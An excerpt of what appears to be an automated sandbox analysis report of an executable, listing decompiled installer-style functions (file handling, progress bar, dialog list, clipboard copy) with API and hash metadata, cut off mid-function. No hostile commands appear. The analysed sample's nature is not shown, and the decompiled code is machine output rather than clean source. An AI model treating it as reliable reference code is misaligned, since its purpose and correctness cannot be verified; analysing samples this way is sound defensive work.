                • Opcode Fuzzy Hash: 63ea715109260620e1cc643b3b38af3e1470e562ac9841a4740e8934b88e8816
                • Instruction Fuzzy Hash: D9012D31D04105EBCB21AFA5DD85A9E7AB5EF40344F14803BFA05B61E1C7BD4A41DF9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403664() {
                				void* _t1;
                				void* _t2;
                				void* _t3;
                				void* _t6;
                				signed int _t11;
                
                				_t1 =  *0x409020; // 0xffffffff
                				if(_t1 != 0xffffffff) {
                					CloseHandle(_t1);
                					 *0x409020 =  *0x409020 | 0xffffffff;
                				}
                				_t2 =  *0x409024; // 0xffffffff
                				if(_t2 != 0xffffffff) {
                					CloseHandle(_t2);
                					 *0x409024 =  *0x409024 | 0xffffffff;
                					_t11 =  *0x409024;
                				}
                				_t3 = E00405426(_t6, _t11, "C:\\Users\\alfons\\AppData\\Local\\Temp\\nsm4D7E.tmp\\", 7); // executed
                				return _t3;
                			}









                APIs
                • CloseHandle.KERNEL32(FFFFFFFF,00000000,004034D4,00000000), ref: 00403676
                • CloseHandle.KERNEL32(FFFFFFFF,00000000,004034D4,00000000), ref: 0040368A
                Strings
                • C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\, xrefs: 00403695
                Similarity
                • API ID: CloseHandle
                • String ID: C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\
                • API String ID: 2962429428-1191056838
                • Opcode ID: 16c7fddc27a42458c1d873a3e0a24777e1257085425b1f33580ea887bd94cc5b
                • Instruction ID: 388c8ae895ed4ea73890f6290ee17e3c52ce59555f833da3370ec015b8cfd073
                • Opcode Fuzzy Hash: 16c7fddc27a42458c1d873a3e0a24777e1257085425b1f33580ea887bd94cc5b
                • Instruction Fuzzy Hash: CCE01235D0472066C628AB7CFE49E553B69AB053357640726F238F62F1C7789C428A5C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040327D(void* _a4, long _a8) {
                				int _t6;
                				long _t10;
                
                				_t10 = _a8;
                				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
                				if(_t6 == 0 || _a8 != _t10) {
                					return 0;
                				} else {
                					return 1;
                				}
                			}






                APIs
                • ReadFile.KERNELBASE(?,00000000,00000000,00000000,tCPInfo,00000000,0040311B,tCPInfo,00004000,?,00000000,00000020,00000020,00402FA7,00000004,00000000), ref: 00403294
                Strings
                Similarity
                • API ID: FileRead
                • String ID: tCPInfo
                • API String ID: 2738559852-2120998202
                • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                • Instruction ID: fb6a36c91f62b4f1fc6c0be421fc724d0e407ee9a1d4d48bf35ddf6d218f7e68
                • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                • Instruction Fuzzy Hash: FAE08C32510219BBCF105E519C00EA73F6CEB093A2F008036F904E5190D238EA10DBA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E00401389(signed int _a4, struct HWND__* _a11) {
                				intOrPtr* _t6;
                				void* _t8;
                				void* _t10;
                				signed int _t11;
                				void* _t12;
                				intOrPtr _t15;
                				signed int _t16;
                				signed int _t17;
                
                				_t17 = _a4;
                				while(_t17 >= 0) {
                					_t15 =  *0x423f50; // 0x74df7c
                					_t6 = _t17 * 0x1c + _t15;
                					if( *_t6 == 1) {
                						break;
                					}
                					_push(_t6); // executed
                					_t8 = E00401434(); // executed
                					if(_t8 == 0x7fffffff) {
                						return 0x7fffffff;
                					}
                					_t10 = E0040136D(_t8);
                					if(_t10 != 0) {
                						_t11 = _t10 - 1;
                						_t16 = _t17;
                						_t17 = _t11;
                						_t12 = _t11 - _t16;
                					} else {
                						_t12 = _t10 + 1;
                						_t17 = _t17 + 1;
                					}
                					if(_a11 != 0) {
                						 *0x42370c =  *0x42370c + _t12;
                						SendMessageA(_a11, 0x402, MulDiv( *0x42370c, 0x7530,  *0x4236f4), 0);
                					}
                				}
                				return 0;
                			}

                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageA.USER32 ref: 004013F4
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: e415eab16c23440566152ba8713208aa0499868cfc73bd855f0a913c78e047d0
                • Instruction ID: 84a05c9b45cf4c5fa881fbb5f17894f913db592f6cd276ec9e0bf70eb6e0573e
                • Opcode Fuzzy Hash: e415eab16c23440566152ba8713208aa0499868cfc73bd855f0a913c78e047d0
                • Instruction Fuzzy Hash: 1E01F471B242119BE7294F789D05B2A36A8E710325F10823BFA55F66F1D67CDC028B4D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E004057CB(CHAR* _a4, long _a8, long _a12) {
                				signed int _t5;
                				void* _t6;
                
                				_t5 = GetFileAttributesA(_a4); // executed
                				asm("sbb ecx, ecx");
                				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                				return _t6;
                			}





                APIs
                • GetFileAttributesA.KERNELBASE(00000003,00402CC1,C:\Users\user\Desktop\O1ySvN9SvL.exe,80000000,00000003), ref: 004057CF
                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004057F1
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 27b1dd0499223472c75b95ee949ae75be2076eeb242b7e9ad2fa61817ef4b739
                • Instruction ID: f93c687e1e26e3b8db63236639f9d4e14dddfc66631b4e0972b173020c912dad
                • Opcode Fuzzy Hash: 27b1dd0499223472c75b95ee949ae75be2076eeb242b7e9ad2fa61817ef4b739
                • Instruction Fuzzy Hash: 8DD09E31658201EFEF098F20DD16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004057AC(CHAR* _a4) {
                				signed char _t3;
                				int _t5;
                
                				_t3 = GetFileAttributesA(_a4); // executed
                				if(_t3 != 0xffffffff) {
                					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
                					return _t5;
                				}
                				return _t3;
                			}





                APIs
                • GetFileAttributesA.KERNELBASE(?,004055B7,?,?,?), ref: 004057B0
                • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004057C2
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: a125b5a99973ee68e412e41cebfce43c29d0215f508127dc280ed1b994480053
                • Instruction ID: 1d3fe654247a7333bacfc0572c6a5cb341717cd3e61d1346c3f88923170604c5
                • Opcode Fuzzy Hash: a125b5a99973ee68e412e41cebfce43c29d0215f508127dc280ed1b994480053
                • Instruction Fuzzy Hash: 95C04C71818501EBD6015B24EF09C1F7F66EB50721B508B35F469E00F0C7359C66EA2A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004032AF(long _a4) {
                				long _t2;
                
                				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
                				return _t2;
                			}




                APIs
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EF6,00007DE4), ref: 004032BD
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00404FDD(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                				struct HWND__* _v8;
                				long _v12;
                				struct tagRECT _v28;
                				void* _v36;
                				signed int _v40;
                				int _v44;
                				int _v48;
                				signed int _v52;
                				int _v56;
                				void* _v60;
                				void* _v68;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				long _t87;
                				struct HMENU__* _t89;
                				unsigned int _t92;
                				unsigned int _t93;
                				int _t94;
                				int _t95;
                				long _t98;
                				void* _t101;
                				intOrPtr _t123;
                				struct HWND__* _t127;
                				int _t149;
                				int _t150;
                				struct HWND__* _t154;
                				struct HWND__* _t158;
                				struct HMENU__* _t160;
                				long _t162;
                				void* _t163;
                				short* _t164;
                
                				_t154 =  *0x423704; // 0x0
                				_t149 = 0;
                				_v8 = _t154;
                				if(_a8 != 0x110) {
                					__eflags = _a8 - 0x405;
                					if(_a8 == 0x405) {
                						CloseHandle(CreateThread(0, 0, E00404F71, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                					}
                					__eflags = _a8 - 0x111;
                					if(_a8 != 0x111) {
                						L17:
                						__eflags = _a8 - 0x404;
                						if(_a8 != 0x404) {
                							L25:
                							__eflags = _a8 - 0x7b;
                							if(_a8 != 0x7b) {
                								goto L20;
                							}
                							__eflags = _a12 - _t154;
                							if(_a12 != _t154) {
                								goto L20;
                							}
                							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                							__eflags = _t87 - _t149;
                							_a8 = _t87;
                							if(_t87 <= _t149) {
                								L37:
                								return 0;
                							}
                							_t89 = CreatePopupMenu();
                							_push(0xffffffe1);
                							_push(_t149);
                							_t160 = _t89;
                							AppendMenuA(_t160, _t149, 1, E00405B16(_t149, _t154, _t160));
                							_t92 = _a16;
                							__eflags = _t92 - 0xffffffff;
                							if(_t92 != 0xffffffff) {
                								_t150 = _t92;
                								_t93 = _t92 >> 0x10;
                								__eflags = _t93;
                								_t94 = _t93;
                							} else {
                								GetWindowRect(_t154,  &_v28);
                								_t150 = _v28.left;
                								_t94 = _v28.top;
                							}
                							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                							_t162 = 1;
                							__eflags = _t95 - 1;
                							if(_t95 == 1) {
                								_v60 = _t149;
                								_v48 = 0x420530;
                								_v44 = 0xfff;
                								_a4 = _a8;
                								do {
                									_a4 = _a4 - 1;
                									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                									__eflags = _a4 - _t149;
                									_t162 = _t162 + _t98 + 2;
                								} while (_a4 != _t149);
                								OpenClipboard(_t149);
                								EmptyClipboard();
                								_t101 = GlobalAlloc(0x42, _t162);
                								_a4 = _t101;
                								_t163 = GlobalLock(_t101);
                								do {
                									_v48 = _t163;
                									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                									 *_t164 = 0xa0d;
                									_t163 = _t164 + 2;
                									_t149 = _t149 + 1;
                									__eflags = _t149 - _a8;
                								} while (_t149 < _a8);
                								GlobalUnlock(_a4);
                								SetClipboardData(1, _a4);
                								CloseClipboard();
                							}
                							goto L37;
                						}
                						__eflags =  *0x4236ec - _t149; // 0x7fffffff
                						if(__eflags == 0) {
                							ShowWindow( *0x423f24, 8);
                							__eflags =  *0x423fac - _t149; // 0x0
                							if(__eflags == 0) {
                								E00404E9F( *((intOrPtr*)( *0x41fd00 + 0x34)), _t149);
                							}
                							E00403ECE(1);
                							goto L25;
                						}
                						 *0x41f8f8 = 2;
                						E00403ECE(0x78);
                						goto L20;
                					} else {
                						__eflags = _a12 - 0x403;
                						if(_a12 != 0x403) {
                							L20:
                							return E00403F5C(_a8, _a12, _a16);
                						}
                						ShowWindow( *0x4236f0, _t149);
                						ShowWindow(_t154, 8);
                						E00403F2A(_t154);
                						goto L17;
                					}
                				}
                				_v52 = _v52 | 0xffffffff;
                				_v40 = _v40 | 0xffffffff;
                				_v60 = 2;
                				_v56 = 0;
                				_v48 = 0;
                				_v44 = 0;
                				asm("stosd");
                				asm("stosd");
                				_t123 =  *0x423f28; // 0x74d188
                				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                				 *0x4236f0 = GetDlgItem(_a4, 0x403);
                				 *0x4236e8 = GetDlgItem(_a4, 0x3ee);
                				_t127 = GetDlgItem(_a4, 0x3f8);
                				 *0x423704 = _t127;
                				_v8 = _t127;
                				E00403F2A( *0x4236f0);
                				 *0x4236f4 = E00404741(4);
                				 *0x42370c = 0;
                				GetClientRect(_v8,  &_v28);
                				_v52 = _v28.right - GetSystemMetrics(0x15);
                				SendMessageA(_v8, 0x101b, 0,  &_v60);
                				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                				if(_a8 >= 0) {
                					SendMessageA(_v8, 0x1001, 0, _a8);
                					SendMessageA(_v8, 0x1026, 0, _a8);
                				}
                				if(_a12 >= _t149) {
                					SendMessageA(_v8, 0x1024, _t149, _a12);
                				}
                				_push( *((intOrPtr*)(_a16 + 0x30)));
                				_push(0x1b);
                				E00403EF5(_a4);
                				if(( *0x423f30 & 0x00000003) != 0) {
                					ShowWindow( *0x4236f0, _t149);
                					if(( *0x423f30 & 0x00000002) != 0) {
                						 *0x4236f0 = _t149;
                					} else {
                						ShowWindow(_v8, 8);
                					}
                					E00403F2A( *0x4236e8);
                				}
                				_t158 = GetDlgItem(_a4, 0x3ec);
                				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                				if(( *0x423f30 & 0x00000004) != 0) {
                					SendMessageA(_t158, 0x409, _t149, _a12);
                					SendMessageA(_t158, 0x2001, _t149, _a8);
                				}
                				goto L37;
                			}

                APIs
                • GetDlgItem.USER32 ref: 0040503C
                • GetDlgItem.USER32 ref: 0040504B
                • GetClientRect.USER32 ref: 00405088
                • GetSystemMetrics.USER32 ref: 00405090
                • SendMessageA.USER32 ref: 004050B1
                • SendMessageA.USER32 ref: 004050C2
                • SendMessageA.USER32 ref: 004050D5
                • SendMessageA.USER32 ref: 004050E3
                • SendMessageA.USER32 ref: 004050F6
                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405118
                • ShowWindow.USER32(?,00000008), ref: 0040512C
                • GetDlgItem.USER32 ref: 0040514D
                • SendMessageA.USER32 ref: 0040515D
                • SendMessageA.USER32 ref: 00405176
                • SendMessageA.USER32 ref: 00405182
                • GetDlgItem.USER32 ref: 0040505A
                  • Part of subcall function 00403F2A: SendMessageA.USER32 ref: 00403F38
                • GetDlgItem.USER32 ref: 0040519F
                • CreateThread.KERNEL32 ref: 004051AD
                • CloseHandle.KERNEL32(00000000), ref: 004051B4
                • ShowWindow.USER32(00000000), ref: 004051D8
                • ShowWindow.USER32(00000000,00000008), ref: 004051DD
                • ShowWindow.USER32(00000008), ref: 00405224
                • SendMessageA.USER32 ref: 00405256
                • CreatePopupMenu.USER32 ref: 00405267
                • AppendMenuA.USER32 ref: 0040527C
                • GetWindowRect.USER32 ref: 0040528F
                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052B3
                • SendMessageA.USER32 ref: 004052EE
                • OpenClipboard.USER32(00000000), ref: 004052FE
                • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405304
                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 0040530D
                • GlobalLock.KERNEL32 ref: 00405317
                • SendMessageA.USER32 ref: 0040532B
                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405343
                • SetClipboardData.USER32(00000001,00000000), ref: 0040534E
                • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405354
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                • String ID: {
                • API String ID: 590372296-366298937
                • Opcode ID: b3ec08184f05c81d6d75b8571aa97232ad7eaacc78b900a8a85595b4445b9a13
                • Instruction ID: ce63edb53461e73d1802b3fb2e279853447b443b010abc9b5e4e8924112ec9d2
                • Opcode Fuzzy Hash: b3ec08184f05c81d6d75b8571aa97232ad7eaacc78b900a8a85595b4445b9a13
                • Instruction Fuzzy Hash: 0AA14A70900209BFDB219F60DD89EAE7F79FB08355F00817AFA05BA2A0C7795A41DF59
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E004047EE(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                				struct HWND__* _v8;
                				struct HWND__* _v12;
                				signed int _v16;
                				intOrPtr _v20;
                				void* _v24;
                				long _v28;
                				int _v32;
                				signed int _v40;
                				int _v44;
                				signed int* _v56;
                				intOrPtr _v60;
                				signed int _v64;
                				long _v68;
                				void* _v72;
                				intOrPtr _v76;
                				intOrPtr _v80;
                				void* _v84;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				struct HWND__* _t182;
                				intOrPtr _t183;
                				int _t189;
                				int _t196;
                				intOrPtr _t198;
                				long _t202;
                				signed int _t206;
                				signed int _t217;
                				void* _t220;
                				void* _t221;
                				int _t227;
                				intOrPtr _t231;
                				signed int _t232;
                				signed int _t233;
                				signed int _t240;
                				signed int _t242;
                				signed int _t245;
                				signed int _t247;
                				struct HBITMAP__* _t250;
                				void* _t252;
                				intOrPtr _t258;
                				char* _t268;
                				signed char _t269;
                				long _t274;
                				int _t280;
                				signed int* _t281;
                				int _t282;
                				long _t283;
                				signed int* _t284;
                				int _t285;
                				long _t286;
                				signed int _t287;
                				long _t288;
                				signed int _t291;
                				int _t294;
                				signed int _t298;
                				signed int _t300;
                				signed int _t302;
                				intOrPtr _t309;
                				int* _t310;
                				void* _t311;
                				int _t315;
                				int _t316;
                				int _t317;
                				signed int _t318;
                				void* _t320;
                				void* _t328;
                				void* _t331;
                
                				_v12 = GetDlgItem(_a4, 0x3f9);
                				_t182 = GetDlgItem(_a4, 0x408);
                				_t280 =  *0x423f48; // 0x74d334
                				_t320 = SendMessageA;
                				_v8 = _t182;
                				_t183 =  *0x423f28; // 0x74d188
                				_t315 = 0;
                				_v32 = _t280;
                				_v20 = _t183 + 0x94;
                				if(_a8 != 0x110) {
                					L23:
                					__eflags = _a8 - 0x405;
                					if(_a8 != 0x405) {
                						_t289 = _a16;
                					} else {
                						_a12 = _t315;
                						_t289 = 1;
                						_a8 = 0x40f;
                						_a16 = 1;
                					}
                					__eflags = _a8 - 0x4e;
                					if(_a8 == 0x4e) {
                						L28:
                						__eflags = _a8 - 0x413;
                						_v16 = _t289;
                						if(_a8 == 0x413) {
                							L30:
                							__eflags =  *0x423f31 & 0x00000002;
                							if(( *0x423f31 & 0x00000002) != 0) {
                								L41:
                								__eflags = _v16 - _t315;
                								if(_v16 != _t315) {
                									_t232 = _v16;
                									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                									}
                									_t233 = _v16;
                									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                											 *_t284 =  *_t284 & 0xffffffdf;
                											__eflags =  *_t284;
                										} else {
                											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                										}
                									}
                								}
                								goto L48;
                							}
                							__eflags = _a8 - 0x413;
                							if(_a8 == 0x413) {
                								L33:
                								__eflags = _a8 - 0x413;
                								_t289 = 0 | _a8 != 0x00000413;
                								_t240 = E0040476E(_v8, _a8 != 0x413);
                								__eflags = _t240 - _t315;
                								if(_t240 >= _t315) {
                									_t93 = _t280 + 8; // 0x8
                									_t310 = _t240 * 0x418 + _t93;
                									_t289 =  *_t310;
                									__eflags = _t289 & 0x00000010;
                									if((_t289 & 0x00000010) == 0) {
                										__eflags = _t289 & 0x00000040;
                										if((_t289 & 0x00000040) == 0) {
                											_t298 = _t289 ^ 0x00000001;
                											__eflags = _t298;
                										} else {
                											_t300 = _t289 ^ 0x00000080;
                											__eflags = _t300;
                											if(_t300 >= 0) {
                												_t298 = _t300 & 0xfffffffe;
                											} else {
                												_t298 = _t300 | 0x00000001;
                											}
                										}
                										 *_t310 = _t298;
                										E0040117D(_t240);
                										_t242 =  *0x423f30; // 0x80
                										_t289 = 1;
                										_a8 = 0x40f;
                										_t245 =  !_t242 >> 0x00000008 & 1;
                										__eflags = _t245;
                										_a12 = 1;
                										_a16 = _t245;
                									}
                								}
                								goto L41;
                							}
                							_t289 = _a16;
                							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                								goto L41;
                							}
                							goto L33;
                						}
                						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                							goto L48;
                						}
                						goto L30;
                					} else {
                						__eflags = _a8 - 0x413;
                						if(_a8 != 0x413) {
                							L48:
                							__eflags = _a8 - 0x111;
                							if(_a8 != 0x111) {
                								L56:
                								__eflags = _a8 - 0x200;
                								if(_a8 == 0x200) {
                									SendMessageA(_v8, 0x200, _t315, _t315);
                								}
                								__eflags = _a8 - 0x40b;
                								if(_a8 == 0x40b) {
                									_t220 =  *0x42050c;
                									__eflags = _t220 - _t315;
                									if(_t220 != _t315) {
                										ImageList_Destroy(_t220);
                									}
                									_t221 =  *0x420524;
                									__eflags = _t221 - _t315;
                									if(_t221 != _t315) {
                										GlobalFree(_t221);
                									}
                									 *0x42050c = _t315;
                									 *0x420524 = _t315;
                									 *0x423f80 = _t315;
                								}
                								__eflags = _a8 - 0x40f;
                								if(_a8 != 0x40f) {
                									L86:
                									__eflags = _a8 - 0x420;
                									if(_a8 == 0x420) {
                										__eflags =  *0x423f31 & 0x00000001;
                										if(( *0x423f31 & 0x00000001) != 0) {
                											__eflags = _a16 - 0x20;
                											_t189 = (0 | _a16 == 0x00000020) << 3;
                											__eflags = _t189;
                											_t316 = _t189;
                											ShowWindow(_v8, _t316);
                											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                										}
                									}
                									goto L89;
                								} else {
                									E004011EF(_t289, _t315, _t315);
                									__eflags = _a12 - _t315;
                									if(_a12 != _t315) {
                										E0040140B(8);
                									}
                									__eflags = _a16 - _t315;
                									if(_a16 == _t315) {
                										L73:
                										E004011EF(_t289, _t315, _t315);
                										__eflags =  *0x423f4c - _t315; // 0x3
                										_v32 =  *0x420524;
                										_t196 =  *0x423f48; // 0x74d334
                										_v60 = 0xf030;
                										_v16 = _t315;
                										if(__eflags <= 0) {
                											L84:
                											InvalidateRect(_v8, _t315, 1);
                											_t198 =  *0x4236fc; // 0x74f2a0
                											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                												E0040468C(0x3ff, 0xfffffffb, E00404741(5));
                											}
                											goto L86;
                										} else {
                											_t142 = _t196 + 8; // 0x74d33c
                											_t281 = _t142;
                											do {
                												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                												__eflags = _t202 - _t315;
                												if(_t202 != _t315) {
                													_t291 =  *_t281;
                													_v68 = _t202;
                													__eflags = _t291 & 0x00000001;
                													_v72 = 8;
                													if((_t291 & 0x00000001) != 0) {
                														_t151 =  &(_t281[4]); // 0x74d34c
                														_v72 = 9;
                														_v56 = _t151;
                														_t154 =  &(_t281[0]);
                														 *_t154 = _t281[0] & 0x000000fe;
                														__eflags =  *_t154;
                													}
                													__eflags = _t291 & 0x00000040;
                													if((_t291 & 0x00000040) == 0) {
                														_t206 = (_t291 & 0x00000001) + 1;
                														__eflags = _t291 & 0x00000010;
                														if((_t291 & 0x00000010) != 0) {
                															_t206 = _t206 + 3;
                															__eflags = _t206;
                														}
                													} else {
                														_t206 = 3;
                													}
                													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                													__eflags = _t294;
                													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                													SendMessageA(_v8, 0x1102, _t294, _v68);
                													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                												}
                												_v16 = _v16 + 1;
                												_t281 =  &(_t281[0x106]);
                												__eflags = _v16 -  *0x423f4c; // 0x3
                											} while (__eflags < 0);
                											goto L84;
                										}
                									} else {
                										_t282 = E004012E2( *0x420524);
                										E00401299(_t282);
                										_t217 = 0;
                										_t289 = 0;
                										__eflags = _t282 - _t315;
                										if(_t282 <= _t315) {
                											L72:
                											SendMessageA(_v12, 0x14e, _t289, _t315);
                											_a16 = _t282;
                											_a8 = 0x420;
                											goto L73;
                										} else {
                											goto L69;
                										}
                										do {
                											L69:
                											_t309 = _v20;
                											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
